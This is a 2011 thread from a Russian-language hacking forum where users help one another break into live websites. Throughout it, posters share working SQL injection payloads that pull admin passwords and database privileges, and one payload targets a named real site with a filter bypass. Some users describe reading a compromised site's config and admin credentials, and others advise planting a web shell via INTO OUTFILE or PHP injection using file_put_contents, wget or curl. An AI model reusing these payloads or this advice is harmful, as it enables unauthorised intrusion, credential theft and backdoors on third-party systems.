Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1
    Если я все правильно понял то:
    1) конструкция такова к примеру в cms_administrator хранятся пассы password
    '+or+1+group%20by%20concat((select%20concat(0x3a,password,0x3a)%20from%20cms_administrator%20limit%200,1),floor(rand(0)*2))%20having%20min(0)%20or%201='
    если это error based

    2) если работаешь в havij то значения он выведет если нажать кнопку Get Data

    3)вопрос, а с чего ты взял что шелл залить некуда? file_priv и m.q значения какие?
     
    #18441 lion-art, 29 Nov 2011
    Last edited: 29 Nov 2011
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    где через скулю я могу посмотреть права пользователя БД?
     
  3. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    File_Priv from mysql.user
    через вывод естественно
     
  4. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    это если юзер один.
    а если юзеров > 1, то
    File_Priv from mysql.user where user= 'юзер'
     
    1 person likes this.
  5. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1
    уважаемые знатоки

    знатоки прошу помощи!! ресурс почти сломлен ситуация такова:

    file_priv Y
    m.q. off
    load работает чтение на ура.

    +and+'select+'+into+outfile+'+!=1'

    ответ Invalid query: File ' !=1' already exists
    и дело не в том что я не могу перевести. С переводом проблем нет. Просто я знаю что там такого файла нет. Если кто не разобрался - задача заливка Shell-а. Не выходит через админку скрипты не работают ограничение по ip идет. По определенным причинам не могу выложить в паблик если у кого было подобное отзовитесь :confused:
     
  6. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    путь есть? папка тоже?
     
  7. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1
    Да есть
    Есть все но в итоге нет ничего...

    даже прочитан config.ini где логин и пасс от бд. но сама бд где то спрятана.
    есть логины и пароли от админки зайти захожу но не могу там ничего нельзя сделать скрипты не работают. Только и остается кричать на помощь! :D
     
  8. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    кинь в пм
     
    1 person likes this.
  9. h0w1tz3r

    h0w1tz3r New Member

    Joined:
    29 Nov 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Уважаемые, подскажите, был сайт уязвим по параметру product.php?id= буквально только что, все товары поменяли на html , а при входу на старый параметр сразу редирект. 7де еще можно покапать уязвимость ???
     
  10. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    Было product.php?id=123{SQL} Значит стало:
    123{SQL}.html
    Abc-123{SQL}.html
    123{SQL}-abc.html
     
    #18450 tabletkO, 30 Nov 2011
    Last edited: 30 Nov 2011
  11. h0w1tz3r

    h0w1tz3r New Member

    Joined:
    29 Nov 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    И еще извиняюсь за глупый вопрос, но как узнать file_priv и m.q , на форуме как то не нашел, а просматривать почти 2к страниц - смерть. И если узер sa значит ли это что file_priv Y ??
     
  12. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    union+select+1,file_priv,3+from+mysql.user+where+user=user()
     
  13. h0w1tz3r

    h0w1tz3r New Member

    Joined:
    29 Nov 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    А если стоит mssql ? Там юнион не работает параметр.
     
  14. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Is this site inject able?

    http://www.martinzaple.co.uk/gallery.php?id=17

    Nothing works on it.
     
  15. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    injectable
     
  16. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    http://www.martinzaple.co.uk/gallery.php?id=-7+/*!union*/+select+1,(select+schema_name+from+information_schema.schemata),3,4,5,6,7--+
    there "union" filter
     
  17. zenon3

    zenon3 New Member

    Joined:
    22 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Народ такой вопрос. Есть скуля msql 4.0.24-standart. Не выводит никак database().
    делаю concat_ws(0x3a,user(),database(),version()) - вся информация есть кроме имени базы. Такое впечатление что для данного user() не в одну базу нет доступа? Линку скинуть пока не могу но хотелось бы разобраться почему такое получается? Может посоветуете чего? Заранее спасибо.
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    практически невозможно,

    лучше скинь в пм, посмотрю
     
    _________________________
  19. Kasper1898

    Kasper1898 New Member

    Joined:
    12 Sep 2011
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    нашел php injection запрос вот такой
    http://сайт/imp_sub.html?_c=${@print(md5(kasper))}&_m=publications&_t=rec&id=1403
    в ответ получаю
    67cb7dbdb935430911459f5431d61701Method {${@print(md5(kasper))}} in class [$this->rec] does not exists!

    Кто подскажет каким методом раскрутить?
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    да что там раскручивать, лей шелл одним запросом, copy, file_put_contents, если системные фунцкии не отключены, то system + wget или system + curl, вобщем фантазируй.

    а в след раз открой учебник по php, прежде чем задавать элементарные вопросы
     
    _________________________
Thread Status:
Not open for further replies.